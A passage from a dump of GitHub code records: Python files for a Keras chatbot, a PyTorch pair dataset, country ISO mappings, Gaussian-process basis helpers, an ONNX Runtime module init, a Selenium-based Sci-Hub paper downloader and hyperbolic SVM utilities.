pickle.dump(elements,open('words.pkl','wb'))\r\n pickle.dump(classes,open('classes.pkl','wb'))\r\n\r\n# create our training data\r\n testData = []\r\n# create an empty array for our output\r\n output_empty = [0] * len(classes)\r\n# training set, bag of words for each sentence\r\n for doc in eleTagPair:\r\n # initialize our bag of words\r\n bag = []\r\n # list of tokenized words for the pattern\r\n pattern_words = doc[0]\r\n # lemmatize each word - create base word, in attempt to represent related words\r\n pattern_words = [lemmatizer.lemmatize(word.lower()) for word in pattern_words]\r\n # create our bag of words array with 1, if word match found in current pattern\r\n for w in elements:\r\n bag.append(1) if w in pattern_words else bag.append(0)\r\n \r\n # output is a '0' for each tag and '1' for current tag (for each pattern)\r\n output_row = list(output_empty)\r\n output_row[classes.index(doc[1])] = 1\r\n \r\n testData.append([bag, output_row])\r\n#print(training)\r\n# shuffle our features and turn into np.array\r\n random.shuffle(testData)\r\n testData = np.array(testData)\r\n# create train and test lists. X - patterns, Y - intents\r\n test_x = list(testData[:,0])\r\n#print(train_x)\r\n test_y = list(testData[:,1])\r\n print(\"Testing data created\")\r\n return test_x, test_y\r\n\r\ndef pad(l, content, width):\r\n l.extend([content] * (width - len(l)))\r\n\r\n\r\ntrain_x, train_y,train_words = train()\r\ntest_x,test_y = test(len(train_words))\r\n \r\n \r\nmodel = Sequential()\r\nmodel.add(Dense(128, input_shape=(len(train_x[0]),), activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(64, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(len(train_y[0]), activation='softmax'))\r\n\r\n# Compile model. 
Stochastic gradient descent with Nesterov accelerated gradient gives good results for this model\r\nsgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\r\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\r\n\r\n#fitting and saving the model \r\nhistory = model.fit(np.array(train_x), np.array(train_y),validation_data=(np.array(test_x), np.array(test_y)), epochs=200, batch_size=5, verbose=0)\r\n# evaluate the model\r\n_, train_acc = model.evaluate(np.array(train_x), np.array(train_y), verbose=0)\r\n_, test_acc = model.evaluate(np.array(test_x), np.array(test_y), verbose=0)\r\nprint('Train: %.3f, Test: %.3f' % (train_acc, test_acc))\r\n\r\n# plot loss during training\r\npyplot.subplot(211)\r\npyplot.title('Loss')\r\npyplot.plot(history.history['loss'], label='train')\r\npyplot.plot(history.history['val_loss'], label='test')\r\npyplot.legend()\r\n# plot accuracy during training\r\npyplot.subplot(212)\r\npyplot.title('Accuracy')\r\npyplot.plot(history.history['accuracy'], label='train')\r\npyplot.plot(history.history['val_accuracy'], label='test')\r\npyplot.legend()\r\npyplot.show()\r\n\r\n","repo_name":"Manjulakh/Chatbot","sub_path":"test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16249756085","text":"import torch\nfrom torch.utils.data import Dataset\nimport numpy as np\n\n\nclass PairsFullSize(Dataset):\n \"\"\"\n Train: For each sample creates randomly a positive or a negative pair\n Test: Creates fixed pairs for testing\n \"\"\"\n\n def __init__(self, data, labels, idx=None):\n if idx is not None:\n self.data = [data[i] for i in idx]\n self.labels = np.array([labels[i] for i in idx])\n else:\n self.data = data\n self.labels = np.array(labels)\n\n self.seed = 42\n\n self.labels_set = list(self.labels)\n self.label_to_indices = {label: np.where(self.labels == label)[0]\n for label in self.labels_set}\n\n def __getitem__(self, index):\n if torch.cuda.is_available():\n device = 'cuda:0'\n else:\n device = 'cpu'\n\n self.seed += 1\n\n item1, label1 = self.data[index], self.labels[index]\n\n if torch.cuda.is_available():\n item1 = item1.cuda()\n\n # selecting genuine pair\n np.random.seed(self.seed)\n\n pair_index = index\n while pair_index == index:\n pair_index = np.random.choice(self.label_to_indices[label1])\n\n item2 = self.data[pair_index]\n\n if torch.cuda.is_available():\n item2 = item2.cuda()\n\n # selecting impostor pair\n\n pair_label = np.random.choice([item for item in self.labels_set if item not in list([label1])])\n pair_index = np.random.choice(self.label_to_indices[pair_label])\n\n item3 = self.data[pair_index]\n\n if torch.cuda.is_available():\n item3 = item3.cuda()\n\n return (item1.float(), item2.float(), item3.float()), (torch.tensor(0, device=device).float(),\n torch.tensor(1, device=device).float())\n\n def __len__(self):\n return len(self.data)\n","repo_name":"MTG/vi_nextcore","sub_path":"dataset/pairs_full_size.py","file_name":"pairs_full_size.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27330309936","text":"china_cities = frozenset(\n [\n \"anqing\",\n \"bengbu\",\n \"hefei\",\n \"huainan\",\n \"huangshan\",\n \"ma’anshan\",\n \"shexian\",\n \"tongcheng\",\n \"tongling\",\n \"wuhu\",\n \"xuancheng\",\n \"beijing\",\n \"chongqing\",\n \"hechuan\",\n \"wanzhou\",\n 
\"fuzhou\",\n \"longyan\",\n \"nanping\",\n \"quanzhou\",\n \"sanming\",\n \"shaowu\",\n \"xiamen\",\n \"yong’an\",\n \"zhangzhou\",\n \"dunhuang\",\n \"jiuquan\",\n \"lanzhou\",\n \"pingliang\",\n \"tianshui\",\n \"wuwei\",\n \"yumen\",\n \"chaozhou\",\n \"foshan\",\n \"guangzhou\",\n \"jiangmen\",\n \"maoming\",\n \"meizhou\",\n \"shantou\",\n \"shaoguan\",\n \"shenzhen\",\n \"zhanjiang\",\n \"zhaoqing\",\n \"zhongshan\",\n \"baise\",\n \"beihai\",\n \"guilin\",\n \"liuzhou\",\n \"nanning\",\n \"pingxiang\",\n \"wuzhou\",\n \"yulin\",\n \"anshun\",\n \"duyun\",\n \"guiyang\",\n \"zunyi\",\n \"haikou\",\n \"baoding\",\n \"cangzhou\",\n \"chengde\",\n \"handan\",\n \"kalgan\",\n \"qinhuangdao\",\n \"shanhaiguan\",\n \"shijiazhuang\",\n \"tangshan\",\n \"xingtai\",\n \"xuanhua\",\n \"zhengding\",\n \"acheng\",\n \"binxian\",\n \"harbin\",\n \"hegang\",\n \"hulan\",\n \"jiamusi\",\n \"jixi\",\n \"mudanjiang\",\n \"qiqihar\",\n \"shuangyashan\",\n \"yichun\",\n \"anyang\",\n \"hebi\",\n \"jiaozuo\",\n \"kaifeng\",\n \"luohe\",\n \"luoyang\",\n \"nanyang\",\n \"shangqiu\",\n \"xinxiang\",\n \"xinyang\",\n \"xuchang\",\n \"zhengzhou\",\n \"zhoukou\",\n \"hongkong\",\n \"victoria\",\n \"daye\",\n \"hankou\",\n \"hanyang\",\n \"huangshi\",\n \"jingzhou\",\n \"laohekou\",\n \"wuchang\",\n \"wuhan\",\n \"xiangfan\",\n \"yichang\",\n \"changde\",\n \"changsha\",\n \"hengyang\",\n \"jinshi\",\n \"shaoyang\",\n \"xiangtan\",\n \"yiyang\",\n \"yueyang\",\n \"zhuzhou\",\n \"baotou\",\n \"chifeng\",\n \"duolun\",\n \"erenhot\",\n \"hailar\",\n \"hohhot\",\n \"jining\",\n \"manzhouli\",\n \"tongliao\",\n \"changshu\",\n \"changzhou\",\n \"huai’an\",\n \"huaiyin\",\n \"lianyungang\",\n \"nanjing\",\n \"nantong\",\n \"suzhou\",\n \"taizhou\",\n \"wuxi\",\n \"xuzhou\",\n \"yancheng\",\n \"yangzhou\",\n \"zhenjiang\",\n \"ganzhou\",\n \"ji’an\",\n \"jingdezhen\",\n \"jiujiang\",\n \"nanchang\",\n \"pingxiang\",\n \"shangrao\",\n \"zhangshu\",\n \"baicheng\",\n \"changchun\",\n \"jilin\",\n \"liaoyuan\",\n \"siping\",\n \"tonghua\",\n \"yanji\",\n \"anshan\",\n \"beipiao\",\n \"benxi\",\n \"dalian\",\n \"dandong\",\n \"fushun\",\n \"fuxin\",\n \"liaoyang\",\n \"lüshun\",\n \"shenyang\",\n \"wafangdian\",\n \"yingkou\",\n \"macau\",\n \"yinchuan\",\n \"golmud\",\n \"lenghu\",\n \"xining\",\n \"ankang\",\n \"baoji\",\n \"hanzhong\",\n \"shangluo\",\n \"tongguan\",\n \"xi’an\",\n \"xianyang\",\n \"yan’an\",\n \"dezhou\",\n \"jinan\",\n \"jining\",\n \"linzi\",\n \"qingdao\",\n \"qufu\",\n \"weifang\",\n \"weihai\",\n \"yantai\",\n \"zaozhuang\",\n \"zibo\",\n \"shanghai\",\n \"changzhi\",\n \"datong\",\n \"jinzhong\",\n \"linfen\",\n \"puzhou\",\n \"taiyuan\",\n \"yangquan\",\n \"chengdu\",\n \"kangding\",\n \"luzhou\",\n \"mianyang\",\n \"nanchong\",\n \"neijiang\",\n \"wutongqiao\",\n \"ya’an\",\n \"yibin\",\n \"zigong\",\n \"tanggu\",\n \"tianjin\",\n \"gartok\",\n \"gyangzê\",\n \"lhasa\",\n \"xigazê\",\n \"hami\",\n \"hotan\",\n \"karamay\",\n \"kashgar\",\n \"kucha\",\n \"kuldja\",\n \"shihezi\",\n \"turfan\",\n \"ürümqi\",\n \"yarkand\",\n \"dali\",\n \"gejiu\",\n \"jinghong\",\n \"kaiyuan\",\n \"kunming\",\n \"pu’er\",\n \"fenghua\",\n \"hangzhou\",\n \"huzhou\",\n \"jiaxing\",\n \"jinhua\",\n \"ningbo\",\n \"quzhou\",\n \"shaoxing\",\n \"wenzhou\",\n ]\n)\n\nnorth_a_map = {\n \"belize\": \"BLZ\",\n \"canada\": \"CAN\",\n \"costa_rica\": \"CRI\",\n \"cuba\": \"CUB\",\n \"dominican_republic\": \"DOM\",\n \"guatemala\": \"GTM\",\n \"jamaica\": \"JAM\",\n \"mexico\": \"MEX\",\n \"panama\": \"PAN\",\n 
\"usa\": \"USA\",\n \"puerto_rico\": \"USA\",\n}\n\nafrica_map = {\n \"algeria\": \"DZA\",\n \"benin\": \"BEN\",\n \"botswana\": \"BWA\",\n \"cameroon\": \"CMR\",\n \"drc\": \"COD\",\n \"democratic_republic_of_the_congo\": \"COD\",\n \"egypt\": \"EGY\",\n \"gabon\": \"GAB\",\n \"gambia\": \"GMB\",\n \"ghana\": \"GHA\",\n \"kenya\": \"KEN\",\n \"madagascar\": \"MDG\",\n \"mali\": \"MLI\",\n \"morocco\": \"MAR\",\n \"nigeria\": \"NGA\",\n \"reunion\": \"REU\",\n \"senegal\": \"SEN\",\n \"sierra_leone\": \"SLE\",\n \"south_africa\": \"ZAF\",\n \"tunisia\": \"TUN\",\n \"uganda\": \"UGA\",\n \"zambia\": \"ZMB\",\n}\n\nsouth_a_map = {\n \"argentina\": \"ARG\",\n \"aruba\": \"ABW\",\n \"brazil\": \"BRA\",\n \"chile\": \"CHL\",\n \"colombia\": \"COL\",\n \"curacao\": \"NLD\",\n \"ecuador\": \"ECU\",\n \"peru\": \"PER\",\n \"suriname\": \"SUR\",\n \"uruguay\": \"URY\",\n \"venezuela\": \"VEN\",\n}\n\neurope_map = {\n \"andorra\": \"AND\",\n \"austria\": \"AUT\",\n \"belarus\": \"BLR\",\n \"belgium\": \"BEL\",\n \"bosnia_and_herzegovina\": \"BIH\",\n \"bulgaria\": \"BGR\",\n \"crimea\": \"RUS\",\n \"croatia\": \"HRV\",\n \"cyprus\": \"CYP\",\n \"czech_republic\": \"CZE\",\n \"denmark\": \"DNK\",\n \"estonia\": \"EST\",\n \"faroe_islands\": \"FRO\",\n \"finland\": \"FIN\",\n \"france\": \"FRA\",\n \"germany\": \"DEU\",\n \"gibraltar\": \"GIB\",\n \"greece\": \"GRC\",\n \"hungary\": \"HUN\",\n \"iceland\": \"ISL\",\n \"ireland\": \"IRL\",\n \"italy\": \"ITA\",\n \"latvia\": \"LVA\",\n \"lithuania\": \"LTU\",\n \"luxembourg\": \"LUX\",\n \"malta\": \"MLT\",\n \"moldova\": \"MDA\",\n \"montenegro\": \"MNE\",\n \"netherlands\": \"NLD\",\n \"north_macedonia\": \"MKD\",\n \"norway\": \"NOR\",\n \"poland\": \"POL\",\n \"portugal\": \"PRT\",\n \"romania\": \"ROU\",\n \"russia\": \"RUS\",\n \"serbia\": \"SRB\",\n \"slovakia\": \"SVK\",\n \"slovenia\": \"SVN\",\n \"spain\": \"ESP\",\n \"sweden\": \"SWE\",\n \"switzerland\": \"CHE\",\n \"turkey\": \"TUR\",\n \"ukraine\": \"UKR\",\n \"united_kingdom\": \"GBR\",\n \"uk\": \"GBR\",\n \"scotland\": \"GBR\",\n \"northern_ireland\": \"GBR\",\n \"wales\": \"GBR\",\n \"england\": \"GBR\",\n}\n\nasia_map = {\n \"bahrain\": \"BHR\",\n \"bahrein\": \"BHR\",\n \"bangladesh\": \"BGD\",\n \"brunei\": \"BRN\",\n \"cambodia\": \"KHM\",\n \"china\": \"CHN\",\n \"georgia\": \"GEO\",\n \"hong_kong\": \"HKG\",\n \"india\": \"IND\",\n \"indonesia\": \"IDN\",\n \"iran\": \"IRN\",\n \"iraq\": \"IRQ\",\n \"israel\": \"ISR\",\n \"japan\": \"JPN\",\n \"jordan\": \"JOR\",\n \"kazakhstan\": \"KAZ\",\n \"kuwait\": \"KWT\",\n \"lebanon\": \"LBN\",\n \"malaysia\": \"MYS\",\n \"mongolia\": \"MNG\",\n \"myanmar\": \"MMR\",\n \"nepal\": \"NPL\",\n \"oman\": \"OMN\",\n \"pakistan\": \"PAK\",\n \"philippines\": \"PHL\",\n \"qatar\": \"QAT\",\n \"saudi_arabia\": \"SAU\",\n \"saudiarabia\": \"SAU\",\n \"singapore\": \"SGP\",\n \"south_korea\": \"KOR\",\n \"sri_lanka\": \"LKA\",\n \"taiwan\": \"TWN\",\n \"thailand\": \"THA\",\n \"timor-leste\": \"TLS\",\n \"united_arab_emirates\": \"ARE\",\n \"uzbekistan\": \"UZB\",\n \"vietnam\": \"VNM\",\n}\n\noceania_map = {\n \"new_zealand\": \"NZL\",\n \"australia\": \"AUS\",\n \"guam\": \"GUM\",\n}\n\n\nclass CountryAlphaMap:\n \"\"\"\n Maps a country name to its corresponding Alpha 3 code\n \"\"\"\n\n @staticmethod\n def getCode(country_name: str) -> str:\n \"\"\"\n Args;\n\n - country_name (str): country_name should be all lower case and have \"_\" in place of \" \".\n\n Returns:\n\n - str: country name with proper capitalization\n - str: country's 
corresponding alpha 3 code\n \"\"\"\n maps = [africa_map, europe_map, south_a_map, north_a_map, asia_map, oceania_map]\n country = \"China\"\n iso_a3 = \"CHN\"\n for continent in maps:\n actl_iso = continent.get(country_name, \"\")\n\n if actl_iso:\n country = \" \".join(\n map(lambda x: x.capitalize(), country_name.split(\"_\"))\n )\n country = \"Saudi Arabia\" if country == \"Saudiarabia\" else country\n\n iso_a3 = actl_iso\n break\n\n return (country, iso_a3)\n","repo_name":"ElasticBottle/primer_checker","sub_path":"cgi_scripts/country_to_alpha.py","file_name":"country_to_alpha.py","file_ext":"py","file_size_in_byte":8666,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"4087666282","text":"from typing import List, Optional, Union\n\nimport numpy as np\nimport pandas as pd\nimport pymc3 as pm\nfrom scipy import linalg\n\n\"\"\"\nCode mainly contributed by Adrian Seyboldt (@aseyboldt) and Luciano Paz (@lucianopaz).\n\"\"\"\n\n\ndef make_sum_zero_hh(N: int) -> np.ndarray:\n \"\"\"\n Build a householder transformation matrix that maps e_1 to a vector of all 1s.\n \"\"\"\n e_1 = np.zeros(N)\n e_1[0] = 1\n a = np.ones(N)\n a /= np.sqrt(a @ a)\n v = e_1 - a\n v /= np.sqrt(v @ v)\n return np.eye(N) - 2 * np.outer(v, v)\n\n\ndef make_centered_gp_eigendecomp(\n time: np.ndarray,\n lengthscale: Union[float, str, List[Union[float, str]]] = 1,\n variance_limit: float = 0.95,\n variance_weight: Optional[List[float]] = None,\n kernel: str = \"gaussian\",\n zerosum: bool = False,\n period: Optional[Union[float, str]] = None,\n):\n \"\"\"\n Decompose the GP into eigen values and eigen vectors.\n Parameters\n ----------\n time : np.ndarray\n Array containing the time points of observations.\n lengthscale : float or str or list\n Length scale parameter of the GP. Set in the ``config`` dictionary.\n A list of lengthscales can be provided when using the Gaussian kernel.\n The corresponding covariance matrices will then be added to each other.\n variance_limit : float\n Controls how many of the eigen vectors of the GP are used. So, if\n ``variance_limit=1``, all eigen vectors are used.\n variance_weight: Optional[List[float]]\n The weight attributed to each covariance function when there are several\n lengthscale. By default all lengthscales have the same weight.\n kernel : str\n Select the kernel function from the two available: gaussian or periodic.\n zerosum : bool\n Constrain all basis functions to sum(basis) = 0. The resulting GP will\n thus sum to 0 along the time axis.\n period : float or str\n Only used if the kernel is periodic. 
Determines the period of the kernel.\n    \"\"\"\n\n    ## Construct covariance matrix\n    X = time[:, None]\n\n    if kernel == \"gaussian\":\n        if isinstance(lengthscale, (int, float, str)):\n            lengthscale = [lengthscale]\n\n        if variance_weight:\n            assert len(variance_weight) == len(\n                lengthscale\n            ), \"`variance_weight` must have the same length as `lengthscale`.\"\n            variance_weight = np.asarray(variance_weight)\n            assert np.isclose(\n                variance_weight.sum(), 1.0\n            ), \"`variance_weight` must sum to 1.\"\n        else:\n            variance_weight = np.ones_like(lengthscale)\n\n        dists = []\n        for ls in lengthscale:\n            if isinstance(ls, str):\n                ls = pd.to_timedelta(ls).to_timedelta64()\n            dists.append(((X - X.T) / np.array(ls)) ** 2)\n\n        cov = sum(\n            w * np.exp(-dist / 2) for (w, dist) in zip(variance_weight, dists)\n        ) / len(lengthscale)\n        # https://gist.github.com/bwengals/481e1f2bc61b0576280cf0f77b8303c6\n\n    elif kernel == \"periodic\":\n        if len(lengthscale) > 1:\n            raise NotImplementedError(\n                \"Multiple lengthscales can only be used with the Gaussian kernel.\"\n            )\n        elif variance_weight:\n            raise NotImplementedError(\n                \"`variance_weight` can only be used with the Gaussian kernel.\"\n            )\n        elif isinstance(period, str):\n            period = pd.to_timedelta(period).to_timedelta64()\n\n        dists = np.pi * ((time[:, None] - time[None, :]) / period)\n        cov = np.exp(-2 * (np.sin(dists) / lengthscale) ** 2)\n\n    # https://gpflow.readthedocs.io/en/master/notebooks/tailor/kernel_design.html\n    elif kernel == \"randomwalk\":\n        # np.testing.assert_allclose returns None, so it can never gate an `if`;\n        # use np.allclose to detect an explicitly set lengthscale\n        if not np.allclose(lengthscale, 1):\n            raise NotImplementedError(\n                \"No lengthscale needed with the Random Walk kernel.\"\n            )\n        elif variance_weight:\n            raise NotImplementedError(\n                \"`variance_weight` can only be used with the Gaussian kernel.\"\n            )\n        cov = np.minimum(X, X.T)\n\n    else:\n        raise ValueError(\n            f\"Unknown kernel = {kernel}. 
Accepted values are 'gaussian', 'periodic' and 'randomwalk'\"\n        )\n\n    if zerosum:\n        Q = make_sum_zero_hh(len(cov))\n        D = np.eye(len(cov))\n        D[0, 0] = 0\n\n        # 1) Transform the covariance matrix so that the first entry\n        #    is the mean: A = Q @ cov @ Q.T\n        # 2) Project onto the subspace without the mean: B = D @ A @ D\n        # 3) Transform the result back to the original space: Q.T @ B @ Q\n        cov = Q.T @ D @ Q @ cov @ Q.T @ D @ Q\n\n    vals, vecs = linalg.eigh(cov)\n    precision_limit_inds = np.logical_or(vals < 0, np.imag(vals) != 0)\n\n    if np.any(precision_limit_inds):\n        cutoff = np.where(precision_limit_inds[::-1])[0][0]\n        vals = vals[len(vals) - cutoff :]\n        vecs = vecs[:, vecs.shape[1] - cutoff :]\n\n    if variance_limit == 1:\n        n_eigs = len(vals)\n\n    else:\n        n_eigs = ((vals[::-1].cumsum() / vals.sum()) > variance_limit).nonzero()[0][0]\n\n    return vecs[:, -n_eigs:] * np.sqrt(vals[-n_eigs:])\n\n\ndef make_gp_basis(time, gp_config, key=None, *, model=None):\n    model = pm.modelcontext(model)\n\n    if gp_config is None:\n        gp_config = {\n            \"lengthscale\": 8,\n            \"kernel\": \"gaussian\",\n            \"zerosum\": False,\n            \"variance_limit\": 0.99,\n        }\n    else:\n        gp_config = gp_config.copy()\n\n    if (\n        np.issubdtype(time.dtype, np.datetime64)\n        or (str(time.dtype).startswith(\"datetime64\"))\n    ) and (\n        gp_config[\"kernel\"] == \"gaussian\"\n        and \"lengthscale\" in gp_config\n        and not isinstance(gp_config[\"lengthscale\"], str)\n    ):\n        gp_config[\"lengthscale\"] = f\"{gp_config['lengthscale'] * 7}D\"\n\n    gp_basis_funcs = make_centered_gp_eigendecomp(time, **gp_config)\n    n_basis = gp_basis_funcs.shape[1]\n    dim = f\"gp_{key}_basis\"\n    model.add_coords({dim: pd.RangeIndex(n_basis)})\n\n    return gp_basis_funcs, dim\n","repo_name":"pollsposition/models","sub_path":"presidential-elections/utils/gpapproximation.py","file_name":"gpapproximation.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"54"}
{"seq_id":"7337753802","text":"import os\nfrom packaging import version\n\n################################################################################\n# All global constants go here, before ORTModule is imported ##################\n################################################################################\nONNX_OPSET_VERSION = 12\nMINIMUM_TORCH_VERSION_STR = '1.8.1'\nTORCH_CPP_BUILD_DIR = os.path.join(os.path.dirname(__file__),'torch_inline_extensions')\n\n# Check whether Torch C++ extension compilation was aborted in previous runs\nif not os.path.exists(TORCH_CPP_BUILD_DIR):\n    os.makedirs(TORCH_CPP_BUILD_DIR, exist_ok = True)\nelif os.path.exists(os.path.join(TORCH_CPP_BUILD_DIR,'lock')):\n    print(\"WARNING: ORTModule detected PyTorch CPP extension's lock file during initialization, \"\n          \"which can cause unexpected hangs. 
\"\n          f\"Delete {os.path.join(TORCH_CPP_BUILD_DIR,'lock')} to prevent unexpected behavior.\")\n\n# Verify proper PyTorch is installed before proceeding to ONNX Runtime initialization\ntry:\n    import torch\n    torch_version = version.parse(torch.__version__.split('+')[0])\n    minimum_torch_version = version.parse(MINIMUM_TORCH_VERSION_STR)\n    if torch_version < minimum_torch_version:\n        raise RuntimeError(\n            f'ONNXRuntime ORTModule frontend requires PyTorch version greater or equal to {MINIMUM_TORCH_VERSION_STR}, '\n            f'but version {torch.__version__} was found instead.')\nexcept ImportError:\n    # a bare string cannot be raised; wrap the message in a proper exception\n    raise ImportError(f'PyTorch {MINIMUM_TORCH_VERSION_STR} must be installed in order to run ONNXRuntime ORTModule frontend!')\n\n# ORTModule must be loaded only after all validation passes\nfrom .ortmodule import ORTModule\n","repo_name":"sirius93123/onnxruntime","sub_path":"orttraining/orttraining/python/training/ortmodule/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"}
{"seq_id":"41721928356","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport sys\n# from scihub import SciHub\nimport os\n\nimport PyQt5.QtCore\nimport pandas as pd\nimport time\nimport glob\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport urllib.request\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import QFileInfo\nfrom bs4 import BeautifulSoup\n\nform_class = uic.loadUiType(\"./sci_hub.ui\")[0]\n\nURL_scihub = 'https://sci-hub.se/'\nCount = 0\n\n\n\nclass Sci_Hub(QDialog, form_class):\n    def __init__(self):\n        super().__init__()\n        self.setupUi(self)\n        self.pushButton.clicked.connect(self.PDF_Down)\n        self.pushButton_2.clicked.connect(self.fileopen)\n        self.pushButton_3.clicked.connect(self.folderopen)\n\n\n    def PDF_Down(self):\n\n        global URL_target\n        global options\n        global driver\n        global html\n        global soup\n        global DownScript\n        global Count\n\n\n        IEEE_export_csv = pd.read_csv(filename[0])\n        DOI_CSV = IEEE_export_csv['DOI']\n        Title_CSV = IEEE_export_csv['Document Title']\n\n        URL_target = URL_scihub + DOI_CSV[Count]\n\n        self.textBrowser.append(Title_CSV[Count])\n        self.textBrowser.append(URL_target)\n\n        options = webdriver.ChromeOptions()\n        #options.add_argument('headless')\n        options.add_experimental_option(\"prefs\", {\n            \"download.default_directory\": str(os.getcwd()) + \"\\\Down_pdf\",\n            \"download.prompt_for_download\": False,\n            \"download.directory_upgrade\": True,\n            \"safebrowsing.enabled\": True\n        })\n        driver = webdriver.Chrome(options=options)\n\n        driver.implicitly_wait(10)\n        driver.get(URL_target)\n        html = driver.page_source\n        soup = BeautifulSoup(html, 'html.parser')\n        soup.getText()\n        DownScript = str(soup.button).rsplit(sep='\"')[1]\n        driver.execute_script(DownScript)\n\n        time.sleep(1)\n        path_dir = str(os.getcwd()) + \"\\\Down_pdf\"+\"\\\*.crdownload\"\n        glob.glob(path_dir)\n        global Wait_flag\n        Wait_flag = bool(glob.glob(path_dir))\n\n        while Wait_flag :\n            Wait_flag = bool(glob.glob(path_dir))\n        Count += 1\n        return 0\n\n\n    # 2. 
Target url\n # for i, DOI in enumerate(DOI_CSV):\n #\n # URL_target = URL_scihub + DOI\n #\n # self.textBrowser.append(Title_CSV[i])\n # self.textBrowser.append(URL_target)\n #\n # options = webdriver.ChromeOptions()\n # #options.add_argument('headless')\n # options.add_experimental_option(\"prefs\", {\n # \"download.default_directory\": str(os.getcwd()) + \"\\Down_pdf\",\n # \"download.prompt_for_download\": False,\n # \"download.directory_upgrade\": True,\n # \"safebrowsing.enabled\": True\n # })\n # driver = webdriver.Chrome(options=options)\n #\n # driver.implicitly_wait(10)\n # driver.get(URL_target)\n # html = driver.page_source\n # soup = BeautifulSoup(html, 'html.parser')\n # soup.getText()\n # DownScript = str(soup.button).rsplit(sep='\"')[1]\n # driver.execute_script(DownScript)\n #\n # time.sleep(1)\n # path_dir = str(os.getcwd()) + \"\\Down_pdf\"+\"\\*.crdownload\"\n # glob.glob(path_dir)\n # global Wait_flag\n # Wait_flag = bool(glob.glob(path_dir))\n #\n # while Wait_flag :\n # Wait_flag = bool(glob.glob(path_dir))\n # return 0\n # return 0\n\n\n def fileopen(self):\n global filename\n filename = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File')\n\n print(filename[0])\n\n\n\n IEEE_export_csv = pd.read_csv(filename[0])\n DOI_CSV = IEEE_export_csv['DOI']\n Title_CSV = IEEE_export_csv['Document Title']\n\n self.textBrowser_2.append(filename[0])\n self.textBrowser.append(filename[0])\n\n\n def folderopen(self):\n global forderpath\n forderpath = QtWidgets.QFileDialog.getExistingDirectory()\n self.textBrowser_3.append(forderpath)\n\n\n\n # Press the green button in the gutter to run the script.\n\n\nif __name__ == '__main__':\n\n # 0. UI loading\n app = QApplication(sys.argv)\n sci_ui = Sci_Hub()\n sci_ui.show()\n app.exec_()\n\n\n","repo_name":"Seobuk/SCI_HUB_DOWN_PDF","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1882735086","text":"import logging\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# Third-party imports\nimport numpy as np\nimport scipy as sp\nimport torch\nfrom numba import jit\n\n\n# =================\n# HYPERBOLOID MODEL\n# =================\n\n\n@jit(parallel=True)\ndef mink_prod(x, y):\n \"\"\"\n (x,y) -> x1*y1 - sum(x2y2, ..., xnyn)\n \n Assume x, y come in batch mode\n\n \"\"\"\n if len(x.shape) < 2:\n x = x.reshape(1, -1)\n if len(y.shape) < 2:\n y = y.reshape(1, -1)\n # head = torch.mul(x[:,0], y[:,0])\n # logger.info(head)\n\n # rest = torch.sum(torch.mul(x, y), 1)\n\n # return head - rest\n\n mink_x = x.copy()\n mink_x[:, 1:] = -mink_x[:, 1:]\n xy = np.float64(mink_x) * np.float64(y)\n\n return np.sum(xy, 1).reshape(-1, 1)\n\n\ndef ball2loid(b):\n \"\"\"\n Convert from poincare ball coordinates to hyperboloid\n\n \"\"\"\n x0 = 2. / (1 - np.sum(b**2, 1)) - 1\n x0 = x0.reshape(-1, 1)\n bx0 = b * (x0+1)\n\n res = np.empty((bx0.shape[0], bx0.shape[1]+1), dtype=np.float64)\n res[:, 0] = x0.ravel()\n res[:, 1:] = bx0\n\n return res\n\n\ndef loid_dist(x, y, from_ball=True):\n \"\"\"\n Hyperbolic distance between x and y. 
We compute it in the hyperboloid\n    model, thus convert to loid from ball, if coordinates are in ball\n\n    \"\"\"\n    if from_ball:\n        # should be in batch x dims \n        x = ball2loid(x.reshape(1, -1))\n        y = ball2loid(y.reshape(1, -1))\n\n    return np.arccosh(mink_prod(x, y).ravel().item())\n\n\ndef loid2ball(l):\n    \"\"\"\n    Convert hyperboloid coordinates to poincare ball\n\n    \"\"\"\n    head = l[:,1:]\n    rest = 1 + l[:, 0]\n    rest = rest.reshape(-1, 1)\n\n    return np.divide(head, rest)\n\n\ndef obj_fn(w, x, y, C):\n    if len(y.shape) < 2:\n        y = y.reshape(-1, 1)\n\n    margin_term = -mink_prod(w, w)/2.0\n    misclass_term = np.arcsinh(1) - np.arcsinh(y * mink_prod(x, w))\n    obj = margin_term + C * np.sum(misclass_term)\n\n    return obj.ravel()\n\n\n@jit(parallel=True)\ndef grad_fn(w, x, y, C):\n    if len(y.shape) < 2:\n        y = y.reshape(-1, 1)\n\n    w_grad_margin = w.copy()\n    w_grad_margin[0] = -1. * w_grad_margin[0]\n    z = np.float64(y * mink_prod(np.float64(x), np.float64(w)))\n    missed = (np.arcsinh(1) - np.arcsinh(z)) > 0\n    # copy x before flipping signs, otherwise the caller's array is mutated in place\n    # (and flips again on every subsequent call)\n    x_grad_misclass = x.copy()\n    x_grad_misclass[:, 1:] = -1. * x_grad_misclass[:, 